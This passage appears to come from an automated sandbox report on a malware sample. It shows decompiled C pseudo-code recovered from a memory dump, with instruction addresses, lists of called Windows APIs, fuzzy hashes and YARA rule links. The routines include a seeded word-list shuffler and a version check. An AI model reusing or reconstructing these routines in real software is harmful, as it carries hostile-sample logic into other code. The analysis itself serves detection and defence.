										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E00A9A23E(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xa9d128();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E00A96ABB(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                                                                                                                                                                                                                0x00a95701
                                                                                                                                                                                                                                0x00a9570c
                                                                                                                                                                                                                                0x00a9570f
                                                                                                                                                                                                                                0x00a95712
                                                                                                                                                                                                                                0x00a95715
                                                                                                                                                                                                                                0x00a9571c
                                                                                                                                                                                                                                0x00a9571e
                                                                                                                                                                                                                                0x00a9572a
                                                                                                                                                                                                                                0x00a9572c
                                                                                                                                                                                                                                0x00a9572c
                                                                                                                                                                                                                                0x00a95735
                                                                                                                                                                                                                                0x00a9573b
                                                                                                                                                                                                                                0x00a95740
                                                                                                                                                                                                                                0x00a9575a
                                                                                                                                                                                                                                0x00a95766
                                                                                                                                                                                                                                0x00a95768
                                                                                                                                                                                                                                0x00a9576d
                                                                                                                                                                                                                                0x00a95777
                                                                                                                                                                                                                                0x00a95777
                                                                                                                                                                                                                                0x00a9576f
                                                                                                                                                                                                                                0x00a9576f
                                                                                                                                                                                                                                0x00a9576f
                                                                                                                                                                                                                                0x00a9576f
                                                                                                                                                                                                                                0x00a9577e
                                                                                                                                                                                                                                0x00a9578b
                                                                                                                                                                                                                                0x00a95792
                                                                                                                                                                                                                                0x00a95797
                                                                                                                                                                                                                                0x00a95797
                                                                                                                                                                                                                                0x00a9579f
                                                                                                                                                                                                                                0x00a957a2
                                                                                                                                                                                                                                0x00a957c8
                                                                                                                                                                                                                                0x00a957d4
                                                                                                                                                                                                                                0x00a957d9
                                                                                                                                                                                                                                0x00a957de
                                                                                                                                                                                                                                0x00a957e0
                                                                                                                                                                                                                                0x00a9580c
                                                                                                                                                                                                                                0x00a9580e
                                                                                                                                                                                                                                0x00a957e2
                                                                                                                                                                                                                                0x00a957e6
                                                                                                                                                                                                                                0x00a957eb
                                                                                                                                                                                                                                0x00a957f0
                                                                                                                                                                                                                                0x00a957f7
                                                                                                                                                                                                                                0x00a957fd
                                                                                                                                                                                                                                0x00a95802
                                                                                                                                                                                                                                0x00a95808
                                                                                                                                                                                                                                0x00a9580f
                                                                                                                                                                                                                                0x00a95811
                                                                                                                                                                                                                                0x00a95813
                                                                                                                                                                                                                                0x00a95822
                                                                                                                                                                                                                                0x00a95828
                                                                                                                                                                                                                                0x00a9582d
                                                                                                                                                                                                                                0x00a9582f
                                                                                                                                                                                                                                0x00a9585f
                                                                                                                                                                                                                                0x00a95861
                                                                                                                                                                                                                                0x00a95831
                                                                                                                                                                                                                                0x00a95831
                                                                                                                                                                                                                                0x00a95837
                                                                                                                                                                                                                                0x00a95844
                                                                                                                                                                                                                                0x00a9584a
                                                                                                                                                                                                                                0x00a9584a
                                                                                                                                                                                                                                0x00a95852
                                                                                                                                                                                                                                0x00a9585b
                                                                                                                                                                                                                                0x00a95862
                                                                                                                                                                                                                                0x00a95864
                                                                                                                                                                                                                                0x00a95866
                                                                                                                                                                                                                                0x00a9586d
                                                                                                                                                                                                                                0x00a9587a
                                                                                                                                                                                                                                0x00a9587f
                                                                                                                                                                                                                                0x00a95884
                                                                                                                                                                                                                                0x00a95886
                                                                                                                                                                                                                                0x00a95888
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9588a
                                                                                                                                                                                                                                0x00a9588f
                                                                                                                                                                                                                                0x00a95891
                                                                                                                                                                                                                                0x00a95898
                                                                                                                                                                                                                                0x00a9589c
                                                                                                                                                                                                                                0x00a9589f
                                                                                                                                                                                                                                0x00a958b4
                                                                                                                                                                                                                                0x00a958b8
                                                                                                                                                                                                                                0x00a958bd
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a958bd
                                                                                                                                                                                                                                0x00a958a1
                                                                                                                                                                                                                                0x00a958a3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a958ae
                                                                                                                                                                                                                                0x00a958b0
                                                                                                                                                                                                                                0x00a958b2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a958b2
                                                                                                                                                                                                                                0x00a95895
                                                                                                                                                                                                                                0x00a95895
                                                                                                                                                                                                                                0x00a95866
                                                                                                                                                                                                                                0x00a957a4
                                                                                                                                                                                                                                0x00a957a4
                                                                                                                                                                                                                                0x00a957a9
                                                                                                                                                                                                                                0x00a958bf
                                                                                                                                                                                                                                0x00a958c3
                                                                                                                                                                                                                                0x00a958cb
                                                                                                                                                                                                                                0x00a958cb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a958c3
                                                                                                                                                                                                                                0x00a957af
                                                                                                                                                                                                                                0x00a957b2
                                                                                                                                                                                                                                0x00a957bc
                                                                                                                                                                                                                                0x00a957c3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a958d3
                                                                                                                                                                                                                                0x00a958d3
                                                                                                                                                                                                                                0x00a958d7
                                                                                                                                                                                                                                0x00a958db
                                                                                                                                                                                                                                0x00a958db

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A92CC9: GetModuleHandleA.KERNEL32(4C44544E,00000000,00A9571A,00000000,00000000), ref: 00A92CD8
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00A95797
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A957E6
                                                                                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(04FD9570), ref: 00A957F7
                                                                                                                                                                                                                                  • Part of subcall function 00A9A23E: memset.NTDLL ref: 00A9A253
                                                                                                                                                                                                                                  • Part of subcall function 00A9A23E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00A9A295
                                                                                                                                                                                                                                  • Part of subcall function 00A9A23E: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 00A9A2A0
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00A95822
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A95852
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4246211962-0
                                                                                                                                                                                                                                • Opcode ID: b130d02edabea32aa197e06ec6b92d85e021cc0535650180709b1943aa5fc050
                                                                                                                                                                                                                                • Instruction ID: 6bfcc367e6efff525c4048e2417d94bb00e13e37054804b82211bdfec2a8e36b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b130d02edabea32aa197e06ec6b92d85e021cc0535650180709b1943aa5fc050
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8651E671F01A24ABDF12EBF4DD87BAE73F8AB04710F144826E506E7151DB7099869B50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A95CFD, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 22%
                                                                                                                                                                                                                                			E00A95CFD(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00A95157(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00A953BB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E00A95157((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xa9d2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                                                                                                                                                                                                0x00a95d04
                                                                                                                                                                                                                                0x00a95d0b
                                                                                                                                                                                                                                0x00a95d10
                                                                                                                                                                                                                                0x00a95d13
                                                                                                                                                                                                                                0x00a95d1a
                                                                                                                                                                                                                                0x00a95d1d
                                                                                                                                                                                                                                0x00a95d20
                                                                                                                                                                                                                                0x00a95d25
                                                                                                                                                                                                                                0x00a95d2a
                                                                                                                                                                                                                                0x00a95e7e
                                                                                                                                                                                                                                0x00a95e80
                                                                                                                                                                                                                                0x00a95e82
                                                                                                                                                                                                                                0x00a95e87
                                                                                                                                                                                                                                0x00a95e87
                                                                                                                                                                                                                                0x00a95d30
                                                                                                                                                                                                                                0x00a95d33
                                                                                                                                                                                                                                0x00a95d36
                                                                                                                                                                                                                                0x00a95d38
                                                                                                                                                                                                                                0x00a95d38
                                                                                                                                                                                                                                0x00a95d3c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95d40
                                                                                                                                                                                                                                0x00a95d6c
                                                                                                                                                                                                                                0x00a95d71
                                                                                                                                                                                                                                0x00a95d73
                                                                                                                                                                                                                                0x00a95d73
                                                                                                                                                                                                                                0x00a95d76
                                                                                                                                                                                                                                0x00a95d79
                                                                                                                                                                                                                                0x00a95d79
                                                                                                                                                                                                                                0x00a95d7b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95d46
                                                                                                                                                                                                                                0x00a95d48
                                                                                                                                                                                                                                0x00a95d67
                                                                                                                                                                                                                                0x00a95d67
                                                                                                                                                                                                                                0x00a95d7e
                                                                                                                                                                                                                                0x00a95d7e
                                                                                                                                                                                                                                0x00a95d7f
                                                                                                                                                                                                                                0x00a95d7f
                                                                                                                                                                                                                                0x00a95d82
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95d82
                                                                                                                                                                                                                                0x00a95d4c
                                                                                                                                                                                                                                0x00a95d93
                                                                                                                                                                                                                                0x00a95d97
                                                                                                                                                                                                                                0x00a95e71
                                                                                                                                                                                                                                0x00a95e73
                                                                                                                                                                                                                                0x00a95e73
                                                                                                                                                                                                                                0x00a95e74
                                                                                                                                                                                                                                0x00a95e77
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e77
                                                                                                                                                                                                                                0x00a95da0
                                                                                                                                                                                                                                0x00a95db1
                                                                                                                                                                                                                                0x00a95db5
                                                                                                                                                                                                                                0x00a95e6d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e6d
                                                                                                                                                                                                                                0x00a95dbb
                                                                                                                                                                                                                                0x00a95dbe
                                                                                                                                                                                                                                0x00a95dc2
                                                                                                                                                                                                                                0x00a95dc6
                                                                                                                                                                                                                                0x00a95dcb
                                                                                                                                                                                                                                0x00a95e63
                                                                                                                                                                                                                                0x00a95e63
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e69
                                                                                                                                                                                                                                0x00a95dd6
                                                                                                                                                                                                                                0x00a95ddf
                                                                                                                                                                                                                                0x00a95df3
                                                                                                                                                                                                                                0x00a95dfa
                                                                                                                                                                                                                                0x00a95e0f
                                                                                                                                                                                                                                0x00a95e15
                                                                                                                                                                                                                                0x00a95e1d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e1f
                                                                                                                                                                                                                                0x00a95e1f
                                                                                                                                                                                                                                0x00a95e1f
                                                                                                                                                                                                                                0x00a95e26
                                                                                                                                                                                                                                0x00a95e2e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e30
                                                                                                                                                                                                                                0x00a95e39
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e3b
                                                                                                                                                                                                                                0x00a95e3d
                                                                                                                                                                                                                                0x00a95e40
                                                                                                                                                                                                                                0x00a95e40
                                                                                                                                                                                                                                0x00a95e43
                                                                                                                                                                                                                                0x00a95e47
                                                                                                                                                                                                                                0x00a95e4a
                                                                                                                                                                                                                                0x00a95e50
                                                                                                                                                                                                                                0x00a95e53
                                                                                                                                                                                                                                0x00a95e5a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95dd6
                                                                                                                                                                                                                                0x00a95d51
                                                                                                                                                                                                                                0x00a95d59
                                                                                                                                                                                                                                0x00a95d5f
                                                                                                                                                                                                                                0x00a95d61
                                                                                                                                                                                                                                0x00a95d61
                                                                                                                                                                                                                                0x00a95d64
                                                                                                                                                                                                                                0x00a95d66
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95d66
                                                                                                                                                                                                                                0x00a95d40
                                                                                                                                                                                                                                0x00a95d86
                                                                                                                                                                                                                                0x00a95d8b
                                                                                                                                                                                                                                0x00a95d8d
                                                                                                                                                                                                                                0x00a95d8d
                                                                                                                                                                                                                                0x00a95d90
                                                                                                                                                                                                                                0x00a95d90
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00A95DFA
                                                                                                                                                                                                                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 00A95E0F
                                                                                                                                                                                                                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00A95E26
                                                                                                                                                                                                                                • lstrlen.KERNEL32(69B25F45), ref: 00A95E4A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3214092121-3916222277
                                                                                                                                                                                                                                • Opcode ID: c33e3416c6157c41ef745f398eae7419e9dae06a6ac70f8c7bd1aa96da449704
                                                                                                                                                                                                                                • Instruction ID: a7ac69b3d4cd82678f0fff12bc8fed964253f73a0ca934b0c7f9e034a7b3ec7f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c33e3416c6157c41ef745f398eae7419e9dae06a6ac70f8c7bd1aa96da449704
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B51A131F00908EBDF22DFA9C9866ADBBF6FF45354F14805AE8149B211C7719B02CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A99EEE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 18%
                                                                                                                                                                                                                                			E00A99EEE(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t65;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t63 = __esi + 0x2c;
				_v16 = 0;
				 *_t63 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t63);
				_t64 = __imp__; // 0x7021fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t64() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E00A95157(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t64() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t65 = E00A95157(_v8 + 1);
							if(_t65 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t65, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t65;
							}
						}
						E00A953BB(_v20);
					}
					goto L12;
				}
			}












                                                                                                                                                                                                                                0x00a99ef4
                                                                                                                                                                                                                                0x00a99efb
                                                                                                                                                                                                                                0x00a99efe
                                                                                                                                                                                                                                0x00a99f01
                                                                                                                                                                                                                                0x00a99f03
                                                                                                                                                                                                                                0x00a99f08
                                                                                                                                                                                                                                0x00a99feb
                                                                                                                                                                                                                                0x00a99ff1
                                                                                                                                                                                                                                0x00a99ff1
                                                                                                                                                                                                                                0x00a99f12
                                                                                                                                                                                                                                0x00a99f19
                                                                                                                                                                                                                                0x00a99f21
                                                                                                                                                                                                                                0x00a99fe2
                                                                                                                                                                                                                                0x00a99fe8
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a99fe8
                                                                                                                                                                                                                                0x00a99f2a
                                                                                                                                                                                                                                0x00a99f2e
                                                                                                                                                                                                                                0x00a99f2f
                                                                                                                                                                                                                                0x00a99f30
                                                                                                                                                                                                                                0x00a99f36
                                                                                                                                                                                                                                0x00a99f37
                                                                                                                                                                                                                                0x00a99f3c
                                                                                                                                                                                                                                0x00a99f43
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a99f49
                                                                                                                                                                                                                                0x00a99f58
                                                                                                                                                                                                                                0x00a99f5b
                                                                                                                                                                                                                                0x00a99f5e
                                                                                                                                                                                                                                0x00a99f67
                                                                                                                                                                                                                                0x00a99f6c
                                                                                                                                                                                                                                0x00a99f71
                                                                                                                                                                                                                                0x00a99fd9
                                                                                                                                                                                                                                0x00a99f73
                                                                                                                                                                                                                                0x00a99f76
                                                                                                                                                                                                                                0x00a99f7a
                                                                                                                                                                                                                                0x00a99f7b
                                                                                                                                                                                                                                0x00a99f7c
                                                                                                                                                                                                                                0x00a99f7d
                                                                                                                                                                                                                                0x00a99f7f
                                                                                                                                                                                                                                0x00a99f86
                                                                                                                                                                                                                                0x00a99fcc
                                                                                                                                                                                                                                0x00a99f88
                                                                                                                                                                                                                                0x00a99f88
                                                                                                                                                                                                                                0x00a99f93
                                                                                                                                                                                                                                0x00a99fa1
                                                                                                                                                                                                                                0x00a99fa5
                                                                                                                                                                                                                                0x00a99fbd
                                                                                                                                                                                                                                0x00a99fa7
                                                                                                                                                                                                                                0x00a99fb0
                                                                                                                                                                                                                                0x00a99fb8
                                                                                                                                                                                                                                0x00a99fb8
                                                                                                                                                                                                                                0x00a99fa5
                                                                                                                                                                                                                                0x00a99fd2
                                                                                                                                                                                                                                0x00a99fd2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a99f71

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A99FE2
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • wcstombs.NTDLL ref: 00A99FB0
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A99FC6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 2631933831-1701360479
                                                                                                                                                                                                                                • Opcode ID: 674c6e99542249f7ac1949ada5ef0944258dbfb8728db9b7bf8e05d3a35dd8a8
                                                                                                                                                                                                                                • Instruction ID: 5c9f4b9d51df816371996d9887c10c1892c09cb829c0950e4c00a2a00e0a3a3a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 674c6e99542249f7ac1949ada5ef0944258dbfb8728db9b7bf8e05d3a35dd8a8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B331E5B5A00609FFDF11DFA9CD85EAEF7F8EB08344F204569E512E3250DA309A459B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A92932, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A92932(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00A99B32(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xa9d2e0; // 0x453a5a8
				_t4 = _t24 + 0xa9edc8; // 0x4fd9370
				_t5 = _t24 + 0xa9ed70; // 0x4f0053
				_t26 = E00A9779A( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xa9d2e0; // 0x453a5a8
						_t11 = _t32 + 0xa9edbc; // 0x4fd9364
						_t48 = _t11;
						_t12 = _t32 + 0xa9ed70; // 0x4f0053
						_t52 = E00A91FCE(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xa9d2e0; // 0x453a5a8
							_t13 = _t35 + 0xa9ee06; // 0x30314549
							_t37 = E00A92AE3(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0xa9d294 - 6;
								if( *0xa9d294 <= 6) {
									_t42 =  *0xa9d2e0; // 0x453a5a8
									_t15 = _t42 + 0xa9ec12; // 0x52384549
									E00A92AE3(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xa9d2e0; // 0x453a5a8
							_t17 = _t38 + 0xa9ee00; // 0x4fd93a8
							_t18 = _t38 + 0xa9edd8; // 0x680043
							_t45 = E00A99BED(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0xa9d270, 0, _t52);
						}
					}
					HeapFree( *0xa9d270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00A9704F(_t54);
				}
				return _t45;
			}



















                                                                                                                                                                                                                                0x00a92932
                                                                                                                                                                                                                                0x00a92942
                                                                                                                                                                                                                                0x00a92945
                                                                                                                                                                                                                                0x00a9294c
                                                                                                                                                                                                                                0x00a9294e
                                                                                                                                                                                                                                0x00a9294e
                                                                                                                                                                                                                                0x00a92951
                                                                                                                                                                                                                                0x00a92956
                                                                                                                                                                                                                                0x00a9295d
                                                                                                                                                                                                                                0x00a9296a
                                                                                                                                                                                                                                0x00a9296f
                                                                                                                                                                                                                                0x00a92973
                                                                                                                                                                                                                                0x00a92981
                                                                                                                                                                                                                                0x00a9298f
                                                                                                                                                                                                                                0x00a92993
                                                                                                                                                                                                                                0x00a92a24
                                                                                                                                                                                                                                0x00a92a24
                                                                                                                                                                                                                                0x00a92999
                                                                                                                                                                                                                                0x00a92999
                                                                                                                                                                                                                                0x00a9299e
                                                                                                                                                                                                                                0x00a9299e
                                                                                                                                                                                                                                0x00a929a5
                                                                                                                                                                                                                                0x00a929b1
                                                                                                                                                                                                                                0x00a929b3
                                                                                                                                                                                                                                0x00a929b5
                                                                                                                                                                                                                                0x00a929b7
                                                                                                                                                                                                                                0x00a929be
                                                                                                                                                                                                                                0x00a929c9
                                                                                                                                                                                                                                0x00a929d0
                                                                                                                                                                                                                                0x00a929d2
                                                                                                                                                                                                                                0x00a929d9
                                                                                                                                                                                                                                0x00a929db
                                                                                                                                                                                                                                0x00a929e2
                                                                                                                                                                                                                                0x00a929ed
                                                                                                                                                                                                                                0x00a929ed
                                                                                                                                                                                                                                0x00a929d9
                                                                                                                                                                                                                                0x00a929f2
                                                                                                                                                                                                                                0x00a929f7
                                                                                                                                                                                                                                0x00a929fe
                                                                                                                                                                                                                                0x00a92a1c
